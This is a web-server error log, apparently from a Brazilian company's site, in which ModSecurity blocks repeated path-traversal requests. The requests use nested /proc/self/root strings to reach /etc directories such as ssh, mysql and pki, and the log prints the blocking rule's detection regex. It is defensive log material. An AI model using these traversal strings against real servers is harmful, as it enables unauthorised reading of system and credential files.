https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:44:57.980683 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:37668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubaeyqAr6etmhZHNopxAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:44:59.300282 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:37680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuba-yqAr6etmhZHNopyAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:05.058961 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:37696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubcRkFeYa1D6dYQnCyHQAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:06.628003 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:37710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubcta6ubjKNq_cu4YEEAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:09.028586 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:34074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubdfu8EFLIOrSqIptjLgAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:10.341681 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:34078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubdta6ubjKNq_cu4YEGAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:11.855264 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:34094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubdxkFeYa1D6dYQnCyIgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:17.879186 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:34102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubffu8EFLIOrSqIptjPAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:21.287453 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:40518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubgQbLMZ6AikZjR9UixQAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:25.263000 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.241.31:40530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubhRkFeYa1D6dYQnCyLgAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:32.583969 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:52410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubjAkwaGbbGflqUZB5iAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:45:56.448892 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.241.31:40536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubpP-YZRR_7pZ7nDJTFAAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:00.992840 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:36640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubqPu8EFLIOrSqIptjUQAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:02.414873 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:36646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubquoXxyEfFpUF8f_W5AAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:28.227824 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:36652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubxOyqAr6etmhZHNop9gAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:31.780875 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:58476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubx8df6f5d65gmYZQ4qwAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:32.915627 2026] [mime_magic:error] [pid 27293:tid 140411607643904] (70014)End of file found: [client 74.7.243.128:34986] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib
[Thu Mar 19 03:46:34.131487 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:58480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubyv-YZRR_7pZ7nDJTPgAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:37.699562 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.243.128:56976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubzV_V7PWP6ixUYl6BjAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:40.163398 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:58490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub0Mdf6f5d65gmYZQ4sAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:46:43.619022 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:56982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub0wbLMZ6AikZjR9Ui_QAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:46:47.884535 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:33850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abub1wbLMZ6AikZjR9UjAgAAABA"], referer: 